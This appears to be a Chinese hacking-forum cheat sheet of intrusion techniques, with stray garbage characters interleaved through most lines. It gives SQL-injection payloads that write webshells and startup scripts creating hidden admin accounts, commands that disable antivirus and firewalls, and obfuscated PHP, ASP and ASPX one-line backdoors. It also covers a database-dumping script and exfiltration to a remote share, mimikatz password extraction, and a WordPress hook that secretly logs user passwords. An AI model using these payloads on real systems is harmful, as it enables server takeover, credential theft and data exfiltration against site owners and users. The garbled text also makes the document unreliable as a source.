/ V; o' M; N0 k! y9 w中文版本操作系统中针对mysql添加用户完整代码:
. e4 E+ E! ~" f$ B  c
% _; r5 g) c: G7 ^: q; Kuse test;4 r3 G% z  A& ^9 S( b7 a0 |( K0 c
create table a (cmd text);
  b  V; g7 }0 i9 O: Z6 Dinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
- z: J1 p5 v; [& d( Ainsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
& C' T: e! W3 T5 [. ^! Minsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );1 m$ I. _+ J" D7 ?9 |) }2 H7 q
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";- C1 W8 B" l  {
drop table a;
5 Z5 M; y$ |  A  J) ~
6 w5 d5 i# h2 ]: h( T# g8 V$ t英文版本:+ {) O4 t6 n! v" }
+ M( H) ]* l4 X- F( t8 U- ?4 \
use test;. B; C, T. \9 S: I% X6 f
create table a (cmd text);
; h) t3 [% {, f9 |( u2 ^0 {insert into a values ("set wshshell=createobject (""wscript.shell"") " );
$ K: S, o9 o, }7 ^' Z' A3 R' Tinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
! ]1 K6 J- l1 Vinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% L. {/ Z( ^( J  E
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
7 P6 Y2 h7 H$ {# |) H/ |  {( Ddrop table a;
5 l) y2 K7 D, [! y) h+ |# e8 Z  p3 X0 l. m* e* w$ b! \
create table a (cmd BLOB);
( s' X# @# l* c8 Linsert into a values (CONVERT(木马的16进制代码,CHAR));4 u1 o9 A: y; W9 c8 w+ y! n
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
8 L4 O% Y3 L8 h. Z  i# o. Cdrop table a;
5 D" L* {9 ^# L5 g, |4 Q: }1 o1 X4 n0 H1 t8 {, N
记录一下怎么处理变态诺顿
# o5 A* h4 B6 f( m查看诺顿服务的路径* l9 B* s1 w: j# z, s- R
sc qc ccSetMgr/ i, z, ]9 T4 T) }% E+ r# S
然后设置权限拒绝访问。做绝一点。。
1 j2 R" b7 n4 o+ ^2 Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
7 ?( C! Z' e2 z& |& qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"+ t7 S/ c" I' k- q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
8 j* ^/ _1 [/ x* ~  p7 P7 ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
8 Q7 x! h) r' Y6 O. K4 K$ I3 z
6 W* V6 p; z" `% {/ H- h7 Y! e7 {0 R; b然后再重启服务器
9 A. C3 o1 ~4 ciisreset /reboot
9 K9 ^6 s9 {% U2 O这样就搞定了。。不过完事后。记得恢复权限。。。。
# v' K1 Y% N$ z/ ~6 a5 kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F6 }# P( m2 E8 }; v$ O- t: Y6 {
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F' e' ?8 |5 Q4 R; y' H3 q$ F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F% ^6 ~& F9 }, v+ e4 P! b9 k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
4 g, D: I; d! e% ^0 t0 u, eSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
; f! U" A* N7 d) d
" H9 }: H  G! ?9 p8 gEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')" {8 t- R' u. A
, s0 ?. T! C, r- g) G1 k7 n9 f6 P
postgresql注射的一些东西7 ~1 p! \3 _/ U
如何获得webshell
0 V) S6 b$ {# Y8 _7 n/ dhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ! g) e6 @" a" x" M
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
5 e- O8 L+ `! p$ a, Dhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;" M* s: I+ O+ N; v- ~( }
如何读文件3 @' I) W' Q0 V
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
' j) e  \9 ]) M* I% w& T& qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;9 h* U: M$ m) J; X1 h. q
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
% P" ^1 @7 k: @4 b/ ]- F
( Z& e0 R( ?% c; {z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。, |. o7 P2 g3 `: _  s
当然,这些的postgresql的数据库版本必须大于8.X; t4 ?4 {: s: _, h4 I7 {
创建一个system的函数:0 W* D2 D8 Z! |( o9 W
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT  i; @0 o; p. X5 H& ]! h
  v9 L7 a( m$ W6 `
创建一个输出表:4 F( f; Q+ N+ y% c1 X
CREATE TABLE stdout(id serial, system_out text), |7 y, U0 Z* V4 Y4 b8 K

9 a6 Q4 _2 r- _; x: m4 b/ q执行shell,输出到输出表内:7 Z8 H1 W7 {" E) s5 a
SELECT system('uname -a > /tmp/test')# X; p' p# _8 }

& @8 H4 \! p  U4 acopy 输出的内容到表里面;
3 `1 A: \4 Y  H- m; xCOPY stdout(system_out) FROM '/tmp/test'
! _5 N/ z9 B, g  t3 \* V( E- y; J5 q7 A3 Q
从输出表内读取执行后的回显,判断是否执行成功
$ m, v+ o! d# x# f  n" p
, ~: B3 A; r0 vSELECT system_out FROM stdout
6 Z+ a7 E0 ^  T" f下面是测试例子
9 q% S# J) j# h4 K" A: f: j
4 w6 D( ^$ f/ S: j/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 1 Q; M) S$ F" p. c; d1 |. M
3 {8 i* D- x* `+ _; v# ?) D
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
' r' q0 q+ ?3 ~4 A! c" z8 @STRICT --
! c5 B% A4 U) }, w' [, V9 Q* T: S* A+ b# ]" c0 w+ Y$ V6 F
/store.php?id=1; SELECT system('uname -a > /tmp/test') --$ s2 A9 q. R4 a! D

7 W( N( ~+ Z- c4 L6 c/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --/ l* q8 r6 _1 Z) W

" f6 r) k! }1 i8 w3 I+ Z) b8 J/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
5 h' L& h) E& W# D1 u) t7 S9 znet stop sharedaccess    stop the default firewall0 C3 d/ u7 y; r/ O5 {
netsh firewall show      show/config default firewall& ?/ ?6 V6 ?6 {
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall) k. {) t% @# P% z
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
1 P& O' G0 w3 O修改3389端口方法(修改后不易被扫出)
% w/ V* s  F: Q3 M1 w% a修改服务器端的端口设置,注册表有2个地方需要修改
% X7 l) B. ]0 U) ^7 d/ S9 }* q1 |* b! G" n  {
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
5 k# F1 z/ T1 }PortNumber值,默认是3389,修改成所希望的端口,比如6000
* }$ y7 m8 ]6 |2 C' Q. y* E1 O! K' p$ s
第二个地方:
0 U0 c1 k% s$ O2 L* O5 [3 I' n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] / D, R- \9 P6 h/ t4 P" s
PortNumber值,默认是3389,修改成所希望的端口,比如6000
# S; Y8 {6 A- r' F
6 I. ?! i2 e* `现在这样就可以了。重启系统就可以了
; z( u! P$ v0 b+ U) {- ^. Z; q0 t+ ^
. E: ?& Z% b+ P查看3389远程登录的脚本
7 O* m5 ]; }( j6 P3 e  G5 C: o保存为一个bat文件7 i7 C  G; i! h9 G
date /t >>D:\sec\TSlog\ts.log
8 A  Q! Y5 e! u4 Itime /t >>D:\sec\TSlog\ts.log
$ I2 c. c! M5 e3 L; p1 ~netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log/ G. b/ _4 b8 R0 L
start Explorer
) R$ p& J: d# o1 ?, D3 M, K/ R4 q2 O3 o" e
mstsc的参数:( d, r, _0 S2 e# J" }& R

  a* `1 i1 J! g% m5 A3 `  g远程桌面连接/ H5 q: y: j2 `7 V5 m0 P

3 F7 P0 P) F* ?& e5 |! d  M2 @MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]- \" c" u! s- Y" }: K# l
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
( _2 n, e; z* E( \/ U; V
6 W$ A# w/ M# g' {( g; B" w3 c<Connection File> -- 指定连接的 .rdp 文件的名称。: C! m, L+ P+ c+ z7 |

! C' P+ [) F/ ]* G( D/v:<server[:port]> -- 指定要连接到的终端服务器。
) |6 |# e0 u' x) E8 N- q. j7 ~# S8 X, ^5 g8 @
/console -- 连接到服务器的控制台会话。( r" ~- a  e4 `

0 K. i7 `6 N' W, y3 R+ f/f -- 以全屏模式启动客户端。
8 Y6 _) b6 T1 ~$ l% E
2 X9 o2 q& v4 B' I$ f/w:<width> --  指定远程桌面屏幕的宽度。
8 E# x/ ^- w: p- {2 p/ L+ s! ^) E" @6 ?% ]
/h:<height> -- 指定远程桌面屏幕的高度。; D8 a5 ]/ B6 X* [+ M8 r3 t

/ k* t' F- b" [6 n% \/edit -- 打开指定的 .rdp 文件来编辑。
7 s/ D$ m+ S' L- y: P3 k
9 h' n$ ^, H1 [( h, G/migrate -- 将客户端连接管理器创建的旧版% ~9 ]4 G9 x7 V% q' ]
连接文件迁移到新的 .rdp 连接文件。( @2 @1 P" T# ?+ N) B! b
# `2 e1 K! J* \0 s6 q

: [# n4 j# I0 l其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就) t. N+ n3 {9 n% Y
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量) T5 `8 A& W. w8 Y% e% v1 o

( R7 p( N% V$ l, k命令行下开启3389
4 Q( e; S! {6 w5 M( M& T5 @1 b* Qnet user asp.net aspnet /add  k, ~, A! C7 H9 T. L
net localgroup Administrators asp.net /add% d  d4 T0 ~2 q3 }; R
net localgroup "Remote Desktop Users" asp.net /add$ E( g9 m3 v# F/ G4 `
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
' f* A0 s3 y: ^4 Xecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0" `2 q3 }; w9 L, W( n5 b* u  O
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1& P8 S! e! C7 K7 l
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
1 W- ^# t2 X/ K& N& usc config rasman start= auto
8 ]" B3 o9 u  p1 I& fsc config remoteaccess start= auto" I/ E$ W+ F7 A( t, J  L: |
net start rasman  j3 o2 ]! c1 t7 ]
net start remoteaccess6 A, y& |: W4 B5 M! o4 B
Media
  {% l- o' m4 }' D7 W/ D<form id="frmUpload" enctype="multipart/form-data"
, {( g* d+ D2 S  N, P2 T6 {action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
/ s7 i4 G6 z6 h7 H: I8 [<input type="file" name="NewFile" size="50"><br>1 w8 k5 f+ f. C$ N, x
<input id="btnUpload" type="submit" value="Upload">) d! x  H5 |  a$ R$ Y. B/ ?0 w
</form>+ A- v6 W$ G* ^5 d, s5 v
7 ^: a9 Z  B1 P3 Y, {5 L9 p5 Z
control userpasswords2 查看用户的密码
/ u' g; z1 Z% j8 baccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
$ O4 Z: g$ _+ [, l3 H% r7 |SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a) }! ~% H  u/ R, L# E, e3 A; @

0 k6 u; I$ l  w! n$ Y( j$ V% w$ y141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
; G! C7 M& n7 T( D9 C4 R测试1:; O9 b5 O  v( ]. U2 j" n4 ^
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1( P: R. w! s" c: X2 {8 _. `
6 M0 {0 C7 y5 J
测试2:
! I$ D4 w6 ]/ y. S. s1 v) S8 E7 @& \: W0 \1 G3 ?+ D/ e
create table dirs(paths varchar(100),paths1 varchar(100), id int)
& d# d) e& x* ]0 G/ [& Q
- z+ `) @, C( V% _' e: ydelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, b: N2 o1 D$ U$ V( w6 h
) O& s( I( I( [5 t4 t/ r! F' {SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; w5 D2 V- L) G0 b$ r) T4 X2 c
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令8 Z% D2 w6 [) E6 d6 ?! a4 c
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
" ?' K) ^, t5 k6 Z- u4 Vnet stop mcafeeframework
" N% y2 q; `4 E" Bnet stop mcshield
; V9 m8 q( }0 m$ }$ y* Inet stop mcafeeengineservice
" l' c& x) G# g6 r; M, ynet stop mctaskmanager4 y  S) W3 ?8 r, O: v
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
* c! T7 }5 F# H5 p9 u  I7 P9 q. p
( x, M- H2 p& {2 Y3 A6 n  VNCDump.zip (4.76 KB, 下载次数: 1) * w8 D  Z( b2 U: l$ k( K" m6 y- T
密码在线破解http://tools88.com/safe/vnc.php
2 d2 [$ [$ \6 B  J' J: X; r' `8 \VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
9 C2 a( e( x: t
5 K& m+ S4 i4 |) n  Xexec master..xp_cmdshell 'net user'4 E6 o# k0 k& Q- T. a5 G, c
mssql执行命令。
) U. \, G  V# d$ y/ {7 }2 C获取mssql的密码hash查询
% ~& _" Q  m8 `6 {  k. zselect name,password from master.dbo.sysxlogins& B& T8 C. o- V& x4 ?

, s2 K7 e* F0 \* u& r$ b7 Gbackup log dbName with NO_LOG;& i8 p. y/ Q3 v  d* A$ p
backup log dbName with TRUNCATE_ONLY;% `# {% F3 }! E
DBCC SHRINKDATABASE(dbName);
0 S, X3 B! Q* r2 C( F0 [9 g3 h. Y+ Amssql数据库压缩
7 S: [4 J: w$ w! a0 Z# [; b
, `" h9 h1 q% `  S2 r& B/ }) Q& bRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK+ j$ C, B' ^- B0 r5 E3 q8 [/ j
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。/ A7 G7 ^2 R; q9 {# Y
9 }4 Z. p8 @. G. e
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'  h2 }  S+ L2 n! k4 C. R
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak9 P( K* K9 Y' B# y
; L1 n4 b; n/ K; h9 f0 i8 G
Discuz!nt35渗透要点:& X( K9 S7 o; ^; }8 P+ W
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default) X: A7 u+ T- k, f
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>% \# ]. b* o* `9 s6 j2 t! _
(3)保存。
$ ]2 q) \* U) ]$ w% ~+ x+ x(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
1 Y# t/ ?% Y) O2 L; dd:\rar.exe a -r d:\1.rar d:\website\: ]0 h8 y; l0 v
递归压缩website
* N, ?* Y( V) L$ J9 ?1 w注意rar.exe的路径. E$ g1 d7 i; f9 s0 M

: k. K( y* `2 t- y<?php3 }" T5 I3 ?' R2 ]

2 Y, ?5 T$ D6 h$ i$telok   = "0${@eval($_POST[xxoo])}";
! b0 ]% h. W3 Q, z, B( M# ]. @7 _8 Z0 c
$username   = "123456";
+ `( [* K3 O& C4 @3 {$ D8 c& u$ Y+ W6 l
$userpwd   = "123456";
# c7 Y' Q! q" M& u7 U
8 a) _/ R8 T# Y% x$telhao   = "123456";& ?  [( k: k7 c" t+ c7 b. m
$ I; k! T* g0 _: N+ W: [1 E' ~+ X
$telinfo   = "123456";
. b( ~  b  O7 B( [' C
. ~9 x+ g3 a: |3 O?>
  K* w* ]' t) W# G7 w% Hphp一句话未过滤插入一句话木马0 @" ?$ R& \$ E9 v+ }8 n  H

4 }$ f$ S) Y( u7 `站库分离脱裤技巧
  y; g- b3 n, q6 j8 V. texec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'  N) k$ T) R; O0 H1 a* t! C
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
% Y% Z( g3 F) U$ z4 O  J条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。/ Y0 h4 A2 G9 W' |* d5 d
这儿利用的是马儿的专家模式(自己写代码)。
/ D) D3 I( Y7 w* _1 j  iini_set('display_errors', 1);2 n5 M- }2 _3 T8 u4 |! z8 N4 u  O
set_time_limit(0);
/ T' u/ }4 s) e4 ~* Werror_reporting(E_ALL);/ E) `6 h" q9 Y/ z0 N
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());6 N- n1 h1 z$ W! _' o
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$ R, \$ u. [: h- K" t' d* r9 O$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());2 s  ~; {0 b' r& f
$i = 0;
9 T# h/ H9 [+ b: g( Z7 d$tmp = '';
. w4 \1 f6 {3 y8 _+ Q! gwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
% Q5 N" J" f$ Y; I! z" n    $i = $i+1;+ W1 M6 Y" x  T' w2 ]; ^; v
    $tmp .=  implode("::", $row)."\n";
" B3 L5 y' e7 c    if(!($i%500)){//500条写入一个文件3 n+ U5 C" h; _. h+ V3 b% f3 M
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';. {* ~8 J' g$ Y0 ~% B. ?! G
        file_put_contents($filename,$tmp);5 {4 _% U* A% {
        $tmp = '';
* W8 ^& a8 E$ _/ M: g  ~/ V# i    }0 Z  }; b2 g3 f* D& U
}0 T) p% g. s/ q' g1 Y) J7 l
mysql_free_result($result);
( I- D) {3 b! `& k- ~( y; U' `
2 ?/ d, g  e' y- d# a7 c
$ W  @# `5 U2 _9 F" p8 g) S% a$ y5 W3 b
//down完后delete
/ u% U- \) f" l) W$ t/ Z8 z3 x" Z2 @

" Z9 G" \' Q6 F6 q% [* kini_set('display_errors', 1);
7 {/ n3 D) Z" O7 r8 Uerror_reporting(E_ALL);
/ }  ?2 x2 ?1 k1 A$i = 0;
/ q( ]. W9 W( Xwhile($i<32) {( j. R2 q3 I1 n+ Q8 f: h
    $i = $i+1;
( P: g( n  l9 k  V4 B% ]7 n        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
9 _2 F0 r+ d0 p& y        unlink($filename);  T* s2 F5 r5 l" u7 k, M0 d+ Y
} 2 Y; d& U+ j1 ]( l7 N5 ~
httprint 收集操作系统指纹
' T$ h% y5 P5 ^% d3 q- G. r扫描192.168.1.100的所有端口7 U4 v% q# F% Z$ S0 W* F
nmap –PN –sT –sV –p0-65535 192.168.1.100
: o# T% ~! _. Y' h; e2 [6 ohost -t ns www.owasp.org 识别的名称服务器,获取dns信息. s. L. |2 K! C+ n3 f
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输9 d% C) l3 Q9 ^
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
. H5 }& y, }2 Z, |* \' {$ E  n' u9 y' u
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
3 U! d% H1 c! Y# ^( \
: V" e) j$ m: j* v  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)* a0 Q5 k& K$ T  ]
! p) W$ Q. k: c7 m
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
# |3 Q6 C6 x% {! v( |' P8 c
* j% X) U+ F7 M! {4 p* o8 Z  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用), ]( R6 o" {+ Y  @- p" x' F

6 x+ ?: P% T+ G+ s( X; X7 k3 I  http://net-square.com/msnpawn/index.shtml (要求安装)7 o2 z3 g3 a; |" Y/ Q$ X1 c3 e( P

1 b  m6 Q# _3 _1 D. s  x  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)3 `2 L+ F/ C4 a- [4 c
& M9 R' x; Z: i" h- V7 S2 ?
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)8 d* t8 d9 K- g9 q, b" U
set names gb2312
& O; v$ }1 S0 C* s/ V导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。: q% t9 b& @( j1 y8 T7 F' I3 F
- B; c" a5 k7 y4 y
mysql 密码修改
# ?( y+ ^4 Y" Q4 i/ @. p1 kUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
% M% {) f1 G/ ~' {update user set password=PASSWORD('antian365.com') where user='root';
0 s) k" P8 q4 C' V' K$ {" B$ ^! gflush privileges;
! ]1 V+ b3 P- T高级的PHP一句话木马后门
/ a3 b" i5 Q7 @" P7 O
4 [7 {9 u; {+ P入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
$ x: N* o/ ~, {
: i" T: C  U* b6 T$ O% X1、
6 {7 d( M( E6 ?' k. c+ ~$ Z/ I& X3 c/ x
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  S$ Z$ W; Z4 f! _, x- C

4 z$ F* c. \$ `0 J* M$hh("/[discuz]/e",$_POST['h'],"Access");
0 _7 R0 z' U9 F; \" r" O8 U  U, E. N
7 R, E3 D: @$ K- e! H( `//菜刀一句话
3 I% ^% }; K% r( |$ b3 x9 v5 ?# _2 r$ q. X# R
2、2 ?2 k2 h( d: D# a( `& G/ `' z" H

/ T( B" E, t8 z2 P  S+ N$filename=$_GET['xbid'];& x# \7 g. _) u0 [" K! J- d% y

; _, L- ?$ N* p0 c# L5 e  Iinclude ($filename);
: H. t% d' c- a' x1 t7 {3 T, Q  U9 [/ p5 w
//危险的include函数,直接编译任何文件为php格式运行  A1 ]. C' U/ \- h. E, _

5 x4 o! l8 S/ [: ?+ p3、
2 H; }. B& k! n% H  T. x9 c
7 l& \/ V5 k% o& G3 B& g2 y0 n/ R$reg="c"."o"."p"."y";- l8 d. k  n3 u! A( K& D6 ~

+ L# E6 {2 _# L" C7 x$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
' G) X! G4 P( q* L( O* d! p! y9 t" B! _# V! y! i6 A" H
//重命名任何文件
) R# ^$ w) Y  C; K# ?6 [' c: p8 Y
! M4 T& P3 X* ^- x2 B& F) ?' `4、- w- G* C7 T( a+ o8 Q. |) K9 L

( b$ ~7 g- O' G* w$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";; M+ Y  u7 R( S3 O& d! o& s; @

" j7 m, k5 U& C4 S, }; y$gzid("/[discuz]/e",$_POST['h'],"Access");+ X) k- K. \8 k" l- G6 z7 G" L
& n, _6 v& W% J/ ]
//菜刀一句话: |1 v, s  E  Y1 ?- S' y7 v6 R9 x
. B% S. T( F0 k( R8 Z
5、include ($uid);
3 M1 h. ]) Z/ h/ H( }
; j, L2 A, x8 U  m  J//危险的include函数,直接编译任何文件为php格式运行,POST $ G" X6 g' ^# K# B8 c
1 D% _" d7 m9 r( |# a6 C

8 S9 C+ l5 K1 o$ [4 R//gif插一句话
6 j' A7 c# B$ |# U$ p9 i
% ]+ U1 }2 X3 K5 O4 v1 V6、典型一句话
0 v5 A% [8 c- O- F% |  ^$ Z* i& J% e! F1 d" \
程序后门代码
2 _! o: W) e4 D( f0 i4 p0 c4 J3 l- w<?php eval_r($_POST[sb])?>: E$ z( {( ?: c' D! q4 j
程序代码( n3 {3 q: B* y1 c8 e: f
<?php @eval_r($_POST[sb])?>+ J3 t3 n+ \8 f9 D
//容错代码
6 }! q; \' f" v- D3 s7 {, z程序代码
5 v  F! p* Y) T7 n) j( S4 J<?php assert($_POST[sb]);?>7 u, A- N, W5 S  R! u: F4 k
//使用lanker一句话客户端的专家模式执行相关的php语句3 o# U& i7 K: D4 u
程序代码
' ^) x  E4 n! b+ H' ~- K<?$_POST['sa']($_POST['sb']);?>
: r6 o) i7 ^( e5 W2 o8 K8 y程序代码, f& W8 [) v( Z4 X* x* _
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>% u0 i3 N+ V4 l9 Z+ `5 u8 L! s
程序代码
  t/ i; T) Y' F0 [<?php
2 G& o8 T" O* V' R, q@preg_replace("/[email]/e",$_POST['h'],"error");0 b& m. i# ~% X  P
?>
: u/ R6 a3 \6 ]3 ^' L" V5 u  R//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
& Q# w+ h  _+ z1 ]# J! V程序代码
7 u/ E9 ^) b& U: N+ p% x<O>h=@eval_r($_POST[c]);</O>
# A7 [# R$ A5 w3 v. }, V程序代码
. G: b1 K* N8 U- Y9 i<script language="php">@eval_r($_POST[sb])</script>. y( R+ A. _( g3 K( ^
//绕过<?限制的一句话1 ]7 z: x3 P. H8 `% ^; b

* D8 ~. t1 x- x* B9 @3 ?2 C! \http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
) o" M4 x* k& w5 U4 v& v' E详细用法:
$ v& R" I( R8 z1、到tools目录。psexec \\127.0.0.1 cmd
$ c& M& V! ]! p; o1 @2、执行mimikatz
9 v$ m7 h3 j" `1 F! G+ a3、执行 privilege::debug
; g; l2 ]7 a( e6 M7 |4、执行 inject::process lsass.exe sekurlsa.dll
. f1 |! m! n' z. `- g' B5、执行@getLogonPasswords
* v0 N8 ~; B, e6、widget就是密码
5 _; }, D. n* Z$ B6 T1 M  ]7、exit退出,不要直接关闭否则系统会崩溃。0 m2 r! s- l9 A: P! c3 z) A
* T( x, w0 Y: ]% D
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
: ?0 e2 P4 @3 x
! z; M3 S1 s8 h7 R自动查找系统高危补丁+ D7 Y: i; D% i3 R4 v
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt" f# L) H; ]3 ^' s
; |$ Y, [' j5 t: M9 j
突破安全狗的一句话aspx后门" b: s6 n6 i; U! X
<%@ Page Language="C#" ValidateRequest="false" %>
2 Y5 x& |$ n& K5 \# ]( b( T& l$ d* e- ~<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>" o  M" N6 G1 Q* i1 y% J
webshell下记录WordPress登陆密码$ Z6 {! t, l* T+ c. o& K: ~
webshell下记录Wordpress登陆密码方便进一步社工1 S0 e6 o4 Z6 C7 J6 y# H
在文件wp-login.php中539行处添加:
0 v6 o6 R' Z# D% A// log password
5 |1 e2 @2 ?  N. @: d: T$log_user=$_POST['log'];. C1 ^1 t6 E) `7 W# {" T2 {7 F# J
$log_pwd=$_POST['pwd'];, j: n) o+ ~0 f# _6 D+ o
$log_ip=$_SERVER["REMOTE_ADDR"];
+ z- ]  t  t$ d3 ?) n: M$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
$ |/ v$ L% I- B9 v6 X$txt=$txt.”\r\n”;
# P8 Y8 @3 F+ T0 |' Vif($log_user&&$log_pwd&&$log_ip){: x5 o. b) t& I) l' O
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);6 [% I$ r. j' A; F" J5 F3 C$ _
}6 _5 c2 C6 e, R) o1 R
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
